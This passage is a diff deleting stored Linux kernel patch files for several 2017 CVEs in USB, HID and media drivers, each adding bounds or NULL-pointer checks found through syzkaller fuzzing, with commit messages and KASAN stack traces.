-   really_probe drivers/base/dd.c:413
-   driver_probe_device+0x610/0xa00 drivers/base/dd.c:557
-   __device_attach_driver+0x230/0x290 drivers/base/dd.c:653
-   bus_for_each_drv+0x161/0x210 drivers/base/bus.c:463
-   __device_attach+0x26e/0x3d0 drivers/base/dd.c:710
-   device_initial_probe+0x1f/0x30 drivers/base/dd.c:757
-   bus_probe_device+0x1eb/0x290 drivers/base/bus.c:523
-   device_add+0xd0b/0x1660 drivers/base/core.c:1835
-   usb_new_device+0x7b8/0x1020 drivers/usb/core/hub.c:2457
-   hub_port_connect drivers/usb/core/hub.c:4903
-   hub_port_connect_change drivers/usb/core/hub.c:5009
-   port_event drivers/usb/core/hub.c:5115
-   hub_event+0x194d/0x3740 drivers/usb/core/hub.c:5195
-   process_one_work+0xc7f/0x1db0 kernel/workqueue.c:2119
-   worker_thread+0x221/0x1850 kernel/workqueue.c:2253
-   kthread+0x3a1/0x470 kernel/kthread.c:231
-   ret_from_fork+0x2a/0x40 arch/x86/entry/entry_64.S:431
-
-This patch adds the checks of out-of-bounce accesses at appropriate
-places and bails out when it goes out of the given buffer.
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/usb/card.c | 20 ++++++++++++++++++++
- 1 file changed, 20 insertions(+)
-
-diff --git a/sound/usb/card.c b/sound/usb/card.c
-index 3dc36d9135502..23d1d23aefec3 100644
---- a/sound/usb/card.c
-+++ b/sound/usb/card.c
-@@ -221,6 +221,7 @@ static int snd_usb_create_streams(struct snd_usb_audio *chip, int ctrlif)
- 	struct usb_interface_descriptor *altsd;
- 	void *control_header;
- 	int i, protocol;
-+	int rest_bytes;
- 
- 	/* find audiocontrol interface */
- 	host_iface = &usb_ifnum_to_if(dev, ctrlif)->altsetting[0];
-@@ -235,6 +236,15 @@ static int snd_usb_create_streams(struct snd_usb_audio *chip, int ctrlif)
- 		return -EINVAL;
- 	}
- 
-+	rest_bytes = (void *)(host_iface->extra + host_iface->extralen) -
-+		control_header;
-+
-+	/* just to be sure -- this shouldn't hit at all */
-+	if (rest_bytes <= 0) {
-+		dev_err(&dev->dev, "invalid control header\n");
-+		return -EINVAL;
-+	}
-+
- 	switch (protocol) {
- 	default:
- 		dev_warn(&dev->dev,
-@@ -245,11 +255,21 @@ static int snd_usb_create_streams(struct snd_usb_audio *chip, int ctrlif)
- 	case UAC_VERSION_1: {
- 		struct uac1_ac_header_descriptor *h1 = control_header;
- 
-+		if (rest_bytes < sizeof(*h1)) {
-+			dev_err(&dev->dev, "too short v1 buffer descriptor\n");
-+			return -EINVAL;
-+		}
-+
- 		if (!h1->bInCollection) {
- 			dev_info(&dev->dev, "skipping empty audio interface (v1)\n");
- 			return -EINVAL;
- 		}
- 
-+		if (rest_bytes < h1->bLength) {
-+			dev_err(&dev->dev, "invalid buffer length (v1)\n");
-+			return -EINVAL;
-+		}
-+
- 		if (h1->bLength < sizeof(*h1) + h1->bInCollection) {
- 			dev_err(&dev->dev, "invalid UAC_HEADER (v1)\n");
- 			return -EINVAL;
diff --git a/Patches/Linux_CVEs/CVE-2017-16530/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16530/^4.13/0001.patch
deleted file mode 100644
index fb683e22..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16530/^4.13/0001.patch
+++ /dev/null
@@ -1,102 +0,0 @@
-From 786de92b3cb26012d3d0f00ee37adf14527f35c4 Mon Sep 17 00:00:00 2001
-From: Alan Stern <stern@rowland.harvard.edu>
-Date: Fri, 22 Sep 2017 11:56:49 -0400
-Subject: [PATCH] USB: uas: fix bug in handling of alternate settings
-
-The uas driver has a subtle bug in the way it handles alternate
-settings.  The uas_find_uas_alt_setting() routine returns an
-altsetting value (the bAlternateSetting number in the descriptor), but
-uas_use_uas_driver() then treats that value as an index to the
-intf->altsetting array, which it isn't.
-
-Normally this doesn't cause any problems because the various
-alternate settings have bAlternateSetting values 0, 1, 2, ..., so the
-value is equal to the index in the array.  But this is not guaranteed,
-and Andrey Konovalov used the syzkaller fuzzer with KASAN to get a
-slab-out-of-bounds error by violating this assumption.
-
-This patch fixes the bug by making uas_find_uas_alt_setting() return a
-pointer to the altsetting entry rather than either the value or the
-index.  Pointers are less subject to misinterpretation.
-
-Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-CC: Oliver Neukum <oneukum@suse.com>
-CC: <stable@vger.kernel.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/usb/storage/uas-detect.h | 15 ++++++++-------
- drivers/usb/storage/uas.c        | 10 +++++-----
- 2 files changed, 13 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/usb/storage/uas-detect.h b/drivers/usb/storage/uas-detect.h
-index f58caa9e6a27e..a155cd02bce24 100644
---- a/drivers/usb/storage/uas-detect.h
-+++ b/drivers/usb/storage/uas-detect.h
-@@ -9,7 +9,8 @@ static int uas_is_interface(struct usb_host_interface *intf)
- 		intf->desc.bInterfaceProtocol == USB_PR_UAS);
- }
- 
--static int uas_find_uas_alt_setting(struct usb_interface *intf)
-+static struct usb_host_interface *uas_find_uas_alt_setting(
-+		struct usb_interface *intf)
- {
- 	int i;
- 
-@@ -17,10 +18,10 @@ static int uas_find_uas_alt_setting(struct usb_interface *intf)
- 		struct usb_host_interface *alt = &intf->altsetting[i];
- 
- 		if (uas_is_interface(alt))
--			return alt->desc.bAlternateSetting;
-+			return alt;
- 	}
- 
--	return -ENODEV;
-+	return NULL;
- }
- 
- static int uas_find_endpoints(struct usb_host_interface *alt,
-@@ -58,14 +59,14 @@ static int uas_use_uas_driver(struct usb_interface *intf,
- 	struct usb_device *udev = interface_to_usbdev(intf);
- 	struct usb_hcd *hcd = bus_to_hcd(udev->bus);
- 	unsigned long flags = id->driver_info;
--	int r, alt;
--
-+	struct usb_host_interface *alt;
-+	int r;
- 
- 	alt = uas_find_uas_alt_setting(intf);
--	if (alt < 0)
-+	if (!alt)
- 		return 0;
- 
--	r = uas_find_endpoints(&intf->altsetting[alt], eps);
-+	r = uas_find_endpoints(alt, eps);
- 	if (r < 0)
- 		return 0;
- 
-diff --git a/drivers/usb/storage/uas.c b/drivers/usb/storage/uas.c
-index cfb1e3bbd4347..63cf981ed81cf 100644
---- a/drivers/usb/storage/uas.c
-+++ b/drivers/usb/storage/uas.c
-@@ -873,14 +873,14 @@ MODULE_DEVICE_TABLE(usb, uas_usb_ids);
- static int uas_switch_interface(struct usb_device *udev,
- 				struct usb_interface *intf)
- {
--	int alt;
-+	struct usb_host_interface *alt;
- 
- 	alt = uas_find_uas_alt_setting(intf);
--	if (alt < 0)
--		return alt;
-+	if (!alt)
-+		return -ENODEV;
- 
--	return usb_set_interface(udev,
--			intf->altsetting[0].desc.bInterfaceNumber, alt);
-+	return usb_set_interface(udev, alt->desc.bInterfaceNumber,
-+			alt->desc.bAlternateSetting);
- }
- 
- static int uas_configure_endpoints(struct uas_dev_info *devinfo)
diff --git a/Patches/Linux_CVEs/CVE-2017-16531/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16531/^4.13/0001.patch
deleted file mode 100644
index 8f6fc288..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16531/^4.13/0001.patch
+++ /dev/null
@@ -1,67 +0,0 @@
-From bd7a3fe770ebd8391d1c7d072ff88e9e76d063eb Mon Sep 17 00:00:00 2001
-From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-Date: Tue, 19 Sep 2017 15:07:17 +0200
-Subject: [PATCH] USB: fix out-of-bounds in usb_set_configuration
-
-Andrey Konovalov reported a possible out-of-bounds problem for a USB interface
-association descriptor.  He writes:
-	It seems there's no proper size check of a USB_DT_INTERFACE_ASSOCIATION
-	descriptor. It's only checked that the size is >= 2 in
-	usb_parse_configuration(), so find_iad() might do out-of-bounds access
-	to intf_assoc->bInterfaceCount.
-
-And he's right, we don't check for crazy descriptors of this type very well, so
-resolve this problem.  Yet another issue found by syzkaller...
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Cc: stable <stable@vger.kernel.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/usb/core/config.c    | 14 +++++++++++---
- include/uapi/linux/usb/ch9.h |  1 +
- 2 files changed, 12 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c
-index 854c8d66cfbef..68b54bd88d1eb 100644
---- a/drivers/usb/core/config.c
-+++ b/drivers/usb/core/config.c
-@@ -643,15 +643,23 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
- 
- 		} else if (header->bDescriptorType ==
- 				USB_DT_INTERFACE_ASSOCIATION) {
-+			struct usb_interface_assoc_descriptor *d;
-+
-+			d = (struct usb_interface_assoc_descriptor *)header;
-+			if (d->bLength < USB_DT_INTERFACE_ASSOCIATION_SIZE) {
-+				dev_warn(ddev,
-+					 "config %d has an invalid interface association descriptor of length %d, skipping\n",
-+					 cfgno, d->bLength);
-+				continue;
-+			}
-+
- 			if (iad_num == USB_MAXIADS) {
- 				dev_warn(ddev, "found more Interface "
- 					       "Association Descriptors "
- 					       "than allocated for in "
- 					       "configuration %d\n", cfgno);
- 			} else {
--				config->intf_assoc[iad_num] =
--					(struct usb_interface_assoc_descriptor
--					*)header;
-+				config->intf_assoc[iad_num] = d;
- 				iad_num++;
- 			}
- 
-diff --git a/include/uapi/linux/usb/ch9.h b/include/uapi/linux/usb/ch9.h
-index ce1169af39d72..2a5d63040a0b0 100644
---- a/include/uapi/linux/usb/ch9.h
-+++ b/include/uapi/linux/usb/ch9.h
-@@ -780,6 +780,7 @@ struct usb_interface_assoc_descriptor {
- 	__u8  iFunction;
- } __attribute__ ((packed));
- 
-+#define USB_DT_INTERFACE_ASSOCIATION_SIZE	8
- 
- /*-------------------------------------------------------------------------*/
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-16532/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16532/^4.13/0001.patch
deleted file mode 100644
index f7439659..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16532/^4.13/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 7c80f9e4a588f1925b07134bb2e3689335f6c6d8 Mon Sep 17 00:00:00 2001
-From: Alan Stern <stern@rowland.harvard.edu>
-Date: Fri, 29 Sep 2017 10:54:24 -0400
-Subject: [PATCH] usb: usbtest: fix NULL pointer dereference
-
-If the usbtest driver encounters a device with an IN bulk endpoint but
-no OUT bulk endpoint, it will try to dereference a NULL pointer
-(out->desc.bEndpointAddress).  The problem can be solved by adding a
-missing test.
-
-Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
----
- drivers/usb/misc/usbtest.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/usb/misc/usbtest.c b/drivers/usb/misc/usbtest.c
-index 113e38bfe0ef9..b3fc602b2e247 100644
---- a/drivers/usb/misc/usbtest.c
-+++ b/drivers/usb/misc/usbtest.c
-@@ -202,12 +202,13 @@ get_endpoints(struct usbtest_dev *dev, struct usb_interface *intf)
- 			return tmp;
- 	}
- 
--	if (in) {
-+	if (in)
- 		dev->in_pipe = usb_rcvbulkpipe(udev,
- 			in->desc.bEndpointAddress & USB_ENDPOINT_NUMBER_MASK);
-+	if (out)
- 		dev->out_pipe = usb_sndbulkpipe(udev,
- 			out->desc.bEndpointAddress & USB_ENDPOINT_NUMBER_MASK);
--	}
-+
- 	if (iso_in) {
- 		dev->iso_in = &iso_in->desc;
- 		dev->in_iso_pipe = usb_rcvisocpipe(udev,
diff --git a/Patches/Linux_CVEs/CVE-2017-16533/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16533/^4.13/0001.patch
deleted file mode 100644
index d44e3e43..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16533/^4.13/0001.patch
+++ /dev/null
@@ -1,105 +0,0 @@
-From f043bfc98c193c284e2cd768fefabe18ac2fed9b Mon Sep 17 00:00:00 2001
-From: Jaejoong Kim <climbbb.kim@gmail.com>
-Date: Thu, 28 Sep 2017 19:16:30 +0900
-Subject: [PATCH] HID: usbhid: fix out-of-bounds bug
-
-The hid descriptor identifies the length and type of subordinate
-descriptors for a device. If the received hid descriptor is smaller than
-the size of the struct hid_descriptor, it is possible to cause
-out-of-bounds.
-
-In addition, if bNumDescriptors of the hid descriptor have an incorrect
-value, this can also cause out-of-bounds while approaching hdesc->desc[n].
-
-So check the size of hid descriptor and bNumDescriptors.
-
-	BUG: KASAN: slab-out-of-bounds in usbhid_parse+0x9b1/0xa20
-	Read of size 1 at addr ffff88006c5f8edf by task kworker/1:2/1261
-
-	CPU: 1 PID: 1261 Comm: kworker/1:2 Not tainted
-	4.14.0-rc1-42251-gebb2c2437d80 #169
-	Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
-	Workqueue: usb_hub_wq hub_event
-	Call Trace:
-	__dump_stack lib/dump_stack.c:16
-	dump_stack+0x292/0x395 lib/dump_stack.c:52
-	print_address_description+0x78/0x280 mm/kasan/report.c:252
-	kasan_report_error mm/kasan/report.c:351
-	kasan_report+0x22f/0x340 mm/kasan/report.c:409
-	__asan_report_load1_noabort+0x19/0x20 mm/kasan/report.c:427
-	usbhid_parse+0x9b1/0xa20 drivers/hid/usbhid/hid-core.c:1004
-	hid_add_device+0x16b/0xb30 drivers/hid/hid-core.c:2944
-	usbhid_probe+0xc28/0x1100 drivers/hid/usbhid/hid-core.c:1369
-	usb_probe_interface+0x35d/0x8e0 drivers/usb/core/driver.c:361
-	really_probe drivers/base/dd.c:413
-	driver_probe_device+0x610/0xa00 drivers/base/dd.c:557
-	__device_attach_driver+0x230/0x290 drivers/base/dd.c:653
-	bus_for_each_drv+0x161/0x210 drivers/base/bus.c:463
-	__device_attach+0x26e/0x3d0 drivers/base/dd.c:710
-	device_initial_probe+0x1f/0x30 drivers/base/dd.c:757
-	bus_probe_device+0x1eb/0x290 drivers/base/bus.c:523
-	device_add+0xd0b/0x1660 drivers/base/core.c:1835
-	usb_set_configuration+0x104e/0x1870 drivers/usb/core/message.c:1932
-	generic_probe+0x73/0xe0 drivers/usb/core/generic.c:174
-	usb_probe_device+0xaf/0xe0 drivers/usb/core/driver.c:266
-	really_probe drivers/base/dd.c:413
-	driver_probe_device+0x610/0xa00 drivers/base/dd.c:557
-	__device_attach_driver+0x230/0x290 drivers/base/dd.c:653
-	bus_for_each_drv+0x161/0x210 drivers/base/bus.c:463
-	__device_attach+0x26e/0x3d0 drivers/base/dd.c:710
-	device_initial_probe+0x1f/0x30 drivers/base/dd.c:757
-	bus_probe_device+0x1eb/0x290 drivers/base/bus.c:523
-	device_add+0xd0b/0x1660 drivers/base/core.c:1835
-	usb_new_device+0x7b8/0x1020 drivers/usb/core/hub.c:2457
-	hub_port_connect drivers/usb/core/hub.c:4903
-	hub_port_connect_change drivers/usb/core/hub.c:5009
-	port_event drivers/usb/core/hub.c:5115
-	hub_event+0x194d/0x3740 drivers/usb/core/hub.c:5195
-	process_one_work+0xc7f/0x1db0 kernel/workqueue.c:2119
-	worker_thread+0x221/0x1850 kernel/workqueue.c:2253
-	kthread+0x3a1/0x470 kernel/kthread.c:231
-	ret_from_fork+0x2a/0x40 arch/x86/entry/entry_64.S:431
-
-Cc: stable@vger.kernel.org
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: Jaejoong Kim <climbbb.kim@gmail.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Acked-by: Alan Stern <stern@rowland.harvard.edu>
-Signed-off-by: Jiri Kosina <jkosina@suse.cz>
----
- drivers/hid/usbhid/hid-core.c | 12 +++++++++++-
- 1 file changed, 11 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/hid/usbhid/hid-core.c b/drivers/hid/usbhid/hid-core.c
-index 089bad8a9a21d..045b5da9b9928 100644
---- a/drivers/hid/usbhid/hid-core.c
-+++ b/drivers/hid/usbhid/hid-core.c
-@@ -975,6 +975,8 @@ static int usbhid_parse(struct hid_device *hid)
- 	unsigned int rsize = 0;
- 	char *rdesc;
- 	int ret, n;
-+	int num_descriptors;
-+	size_t offset = offsetof(struct hid_descriptor, desc);
- 
- 	quirks = usbhid_lookup_quirk(le16_to_cpu(dev->descriptor.idVendor),
- 			le16_to_cpu(dev->descriptor.idProduct));
-@@ -997,10 +999,18 @@ static int usbhid_parse(struct hid_device *hid)
- 		return -ENODEV;
- 	}
- 
-+	if (hdesc->bLength < sizeof(struct hid_descriptor)) {
-+		dbg_hid("hid descriptor is too short\n");
-+		return -EINVAL;
-+	}
-+
- 	hid->version = le16_to_cpu(hdesc->bcdHID);
- 	hid->country = hdesc->bCountryCode;
- 
--	for (n = 0; n < hdesc->bNumDescriptors; n++)
-+	num_descriptors = min_t(int, hdesc->bNumDescriptors,
-+	       (hdesc->bLength - offset) / sizeof(struct hid_class_descriptor));
-+
-+	for (n = 0; n < num_descriptors; n++)
- 		if (hdesc->desc[n].bDescriptorType == HID_DT_REPORT)
- 			rsize = le16_to_cpu(hdesc->desc[n].wDescriptorLength);
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-16534/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16534/^4.13/0001.patch
deleted file mode 100644
index 6056f314..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16534/^4.13/0001.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From 2e1c42391ff2556387b3cb6308b24f6f65619feb Mon Sep 17 00:00:00 2001
-From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-Date: Thu, 21 Sep 2017 16:58:48 +0200
-Subject: [PATCH] USB: core: harden cdc_parse_cdc_header
-
-Andrey Konovalov reported a possible out-of-bounds problem for the
-cdc_parse_cdc_header function.  He writes:
-	It looks like cdc_parse_cdc_header() doesn't validate buflen
-	before accessing buffer[1], buffer[2] and so on. The only check
-	present is while (buflen > 0).
-
-So fix this issue up by properly validating the buffer length matches
-what the descriptor says it is.
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Cc: stable <stable@vger.kernel.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/usb/core/message.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/usb/core/message.c b/drivers/usb/core/message.c
-index 4c38ea41ae969..371a07d874a37 100644
---- a/drivers/usb/core/message.c
-+++ b/drivers/usb/core/message.c
-@@ -2069,6 +2069,10 @@ int cdc_parse_cdc_header(struct usb_cdc_parsed_header *hdr,
- 			elength = 1;
- 			goto next_desc;
- 		}
-+		if ((buflen < elength) || (elength < 3)) {
-+			dev_err(&intf->dev, "invalid descriptor buffer length\n");
-+			break;
-+		}
- 		if (buffer[1] != USB_DT_CS_INTERFACE) {
- 			dev_err(&intf->dev, "skipping garbage\n");
- 			goto next_desc;
diff --git a/Patches/Linux_CVEs/CVE-2017-16535/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16535/^4.13/0001.patch
deleted file mode 100644
index 310c58c9..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16535/^4.13/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 1c0edc3633b56000e18d82fc241e3995ca18a69e Mon Sep 17 00:00:00 2001
-From: Alan Stern <stern@rowland.harvard.edu>
-Date: Wed, 18 Oct 2017 12:49:38 -0400
-Subject: [PATCH] USB: core: fix out-of-bounds access bug in
- usb_get_bos_descriptor()
-
-Andrey used the syzkaller fuzzer to find an out-of-bounds memory
-access in usb_get_bos_descriptor().  The code wasn't checking that the
-next usb_dev_cap_header structure could fit into the remaining buffer
-space.
-
-This patch fixes the error and also reduces the bNumDeviceCaps field
-in the header to match the actual number of capabilities found, in
-cases where there are fewer than expected.
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-CC: <stable@vger.kernel.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/usb/core/config.c | 6 ++++--
- 1 file changed, 4 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c
-index 68b54bd88d1eb..883549ee946cb 100644
---- a/drivers/usb/core/config.c
-+++ b/drivers/usb/core/config.c
-@@ -960,10 +960,12 @@ int usb_get_bos_descriptor(struct usb_device *dev)
- 	for (i = 0; i < num; i++) {
- 		buffer += length;
- 		cap = (struct usb_dev_cap_header *)buffer;
--		length = cap->bLength;
- 
--		if (total_len < length)
-+		if (total_len < sizeof(*cap) || total_len < cap->bLength) {
-+			dev->bos->desc->bNumDeviceCaps = i;
- 			break;
-+		}
-+		length = cap->bLength;
- 		total_len -= length;
- 
- 		if (cap->bDescriptorType != USB_DT_DEVICE_CAPABILITY) {
diff --git a/Patches/Linux_CVEs/CVE-2017-16537/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16537/^4.13/0001.patch
deleted file mode 100644
index c5eeb700..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16537/^4.13/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 58fd55e838276a0c13d1dc7c387f90f25063cbf3 Mon Sep 17 00:00:00 2001
-From: Arvind Yadav <arvind.yadav.cs@gmail.com>
-Date: Mon, 9 Oct 2017 20:14:48 +0200
-Subject: [PATCH] media: imon: Fix null-ptr-deref in imon_probe
-
-It seems that the return value of usb_ifnum_to_if() can be NULL and
-needs to be checked.
-
-Signed-off-by: Arvind Yadav <arvind.yadav.cs@gmail.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-Signed-off-by: Sean Young <sean@mess.org>
-Signed-off-by: Mauro Carvalho Chehab <mchehab@osg.samsung.com>
----
- drivers/media/rc/imon.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/drivers/media/rc/imon.c b/drivers/media/rc/imon.c
-index 9724fe8110e3d..9fef8cc171140 100644
---- a/drivers/media/rc/imon.c
-+++ b/drivers/media/rc/imon.c
-@@ -2515,6 +2515,11 @@ static int imon_probe(struct usb_interface *interface,
- 	mutex_lock(&driver_lock);
- 
- 	first_if = usb_ifnum_to_if(usbdev, 0);
-+	if (!first_if) {
-+		ret = -ENODEV;
-+		goto fail;
-+	}
-+
- 	first_if_ctx = usb_get_intfdata(first_if);
- 
- 	if (ifnum == 0) {
diff --git a/Patches/Linux_CVEs/CVE-2017-16538/^4.13/0001.patch b/Patches/Linux_CVEs/CVE-2017-16538/^4.13/0001.patch
deleted file mode 100644
index 1407917e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16538/^4.13/0001.patch
+++ /dev/null
@@ -1,61 +0,0 @@
-diff --git a/drivers/media/usb/dvb-usb-v2/lmedm04.c b/drivers/media/usb/dvb-usb-v2/lmedm04.c
-index 5e320fa4a795..992f2011a6ba 100644
---- a/drivers/media/usb/dvb-usb-v2/lmedm04.c
-+++ b/drivers/media/usb/dvb-usb-v2/lmedm04.c
-@@ -494,18 +494,23 @@ static int lme2510_pid_filter(struct dvb_usb_adapter *adap, int index, u16 pid,
- 
- static int lme2510_return_status(struct dvb_usb_device *d)
- {
--	int ret = 0;
-+	int ret;
- 	u8 *data;
- 
--	data = kzalloc(10, GFP_KERNEL);
-+	data = kzalloc(6, GFP_KERNEL);
- 	if (!data)
- 		return -ENOMEM;
- 
--	ret |= usb_control_msg(d->udev, usb_rcvctrlpipe(d->udev, 0),
--			0x06, 0x80, 0x0302, 0x00, data, 0x0006, 200);
--	info("Firmware Status: %x (%x)", ret , data[2]);
-+	ret = usb_control_msg(d->udev, usb_rcvctrlpipe(d->udev, 0),
-+			      0x06, 0x80, 0x0302, 0x00,
-+			      data, 0x6, 200);
-+	if (ret != 6)
-+		ret = -EINVAL;
-+	else
-+		ret = data[2];
-+
-+	info("Firmware Status: %6ph", data);
- 
--	ret = (ret < 0) ? -ENODEV : data[2];
- 	kfree(data);
- 	return ret;
- }
-@@ -1189,6 +1194,7 @@ static int lme2510_get_adapter_count(struct dvb_usb_device *d)
- static int lme2510_identify_state(struct dvb_usb_device *d, const char **name)
- {
- 	struct lme2510_state *st = d->priv;
-+	int status;
- 
- 	usb_reset_configuration(d->udev);
- 
-@@ -1197,12 +1203,16 @@ static int lme2510_identify_state(struct dvb_usb_device *d, const char **name)
- 
- 	st->dvb_usb_lme2510_firmware = dvb_usb_lme2510_firmware;
- 
--	if (lme2510_return_status(d) == 0x44) {
-+	status = lme2510_return_status(d);
-+	if (status == 0x44) {
- 		*name = lme_firmware_switch(d, 0);
- 		return COLD;
- 	}
- 
--	return 0;
-+	if (status != 0x47)
-+		return -EINVAL;
-+
-+	return WARM;
- }
- 
- static int lme2510_get_stream_config(struct dvb_frontend *fe, u8 *ts_type,
diff --git a/Patches/Linux_CVEs/CVE-2017-16538/^4.13/0002.patch b/Patches/Linux_CVEs/CVE-2017-16538/^4.13/0002.patch
deleted file mode 100644
index e5ecf350..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16538/^4.13/0002.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-diff --git a/drivers/media/usb/dvb-usb-v2/lmedm04.c b/drivers/media/usb/dvb-usb-v2/lmedm04.c
-index 992f2011a6ba..be26c029546b 100644
---- a/drivers/media/usb/dvb-usb-v2/lmedm04.c
-+++ b/drivers/media/usb/dvb-usb-v2/lmedm04.c
-@@ -1076,8 +1076,6 @@ static int dm04_lme2510_frontend_attach(struct dvb_usb_adapter *adap)
- 
- 		if (adap->fe[0]) {
- 			info("FE Found M88RS2000");
--			dvb_attach(ts2020_attach, adap->fe[0], &ts2020_config,
--					&d->i2c_adap);
- 			st->i2c_tuner_gate_w = 5;
- 			st->i2c_tuner_gate_r = 5;
- 			st->i2c_tuner_addr = 0x60;
-@@ -1143,17 +1141,18 @@ static int dm04_lme2510_tuner(struct dvb_usb_adapter *adap)
- 			ret = st->tuner_config;
- 		break;
- 	case TUNER_RS2000:
--		ret = st->tuner_config;
-+		if (dvb_attach(ts2020_attach, adap->fe[0],
-+			       &ts2020_config, &d->i2c_adap))
-+			ret = st->tuner_config;
- 		break;
- 	default:
- 		break;
- 	}
- 
--	if (ret)
-+	if (ret) {
- 		info("TUN Found %s tuner", tun_msg[ret]);
--	else {
--		info("TUN No tuner found --- resetting device");
--		lme_coldreset(d);
-+	} else {
-+		info("TUN No tuner found");
- 		return -ENODEV;
- 	}
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-16643/3.5+/0001.patch b/Patches/Linux_CVEs/CVE-2017-16643/3.5+/0001.patch
deleted file mode 100644
index 992c8b96..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16643/3.5+/0001.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From a50829479f58416a013a4ccca791336af3c584c7 Mon Sep 17 00:00:00 2001
-From: Dmitry Torokhov <dmitry.torokhov@gmail.com>
-Date: Mon, 23 Oct 2017 16:46:00 -0700
-Subject: [PATCH] Input: gtco - fix potential out-of-bound access
-
-parse_hid_report_descriptor() has a while (i < length) loop, which
-only guarantees that there's at least 1 byte in the buffer, but the
-loop body can read multiple bytes which causes out-of-bounds access.
-
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Reviewed-by: Andrey Konovalov <andreyknvl@google.com>
-Cc: stable@vger.kernel.org
-Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
----
- drivers/input/tablet/gtco.c | 17 ++++++++++-------
- 1 file changed, 10 insertions(+), 7 deletions(-)
-
-diff --git a/drivers/input/tablet/gtco.c b/drivers/input/tablet/gtco.c
-index b796e891e2eed..4b8b9d7aa75e2 100644
---- a/drivers/input/tablet/gtco.c
-+++ b/drivers/input/tablet/gtco.c
-@@ -230,13 +230,17 @@ static void parse_hid_report_descriptor(struct gtco *device, char * report,
- 
- 	/* Walk  this report and pull out the info we need */
- 	while (i < length) {
--		prefix = report[i];
--
--		/* Skip over prefix */
--		i++;
-+		prefix = report[i++];
- 
- 		/* Determine data size and save the data in the proper variable */
--		size = PREF_SIZE(prefix);
-+		size = (1U << PREF_SIZE(prefix)) >> 1;
-+		if (i + size > length) {
-+			dev_err(ddev,
-+				"Not enough data (need %d, have %d)\n",
-+				i + size, length);
-+			break;
-+		}
-+
- 		switch (size) {
- 		case 1:
- 			data = report[i];
-@@ -244,8 +248,7 @@ static void parse_hid_report_descriptor(struct gtco *device, char * report,
- 		case 2:
- 			data16 = get_unaligned_le16(&report[i]);
- 			break;
--		case 3:
--			size = 4;
-+		case 4:
- 			data32 = get_unaligned_le32(&report[i]);
- 			break;
- 		}
diff --git a/Patches/Linux_CVEs/CVE-2017-16645/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-16645/ANY/0001.patch
deleted file mode 100644
index 273c3310..00000000
--- a/Patches/Linux_CVEs/CVE-2017-16645/ANY/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From ea04efee7635c9120d015dcdeeeb6988130cb67a Mon Sep 17 00:00:00 2001
-From: Dmitry Torokhov <dmitry.torokhov@gmail.com>
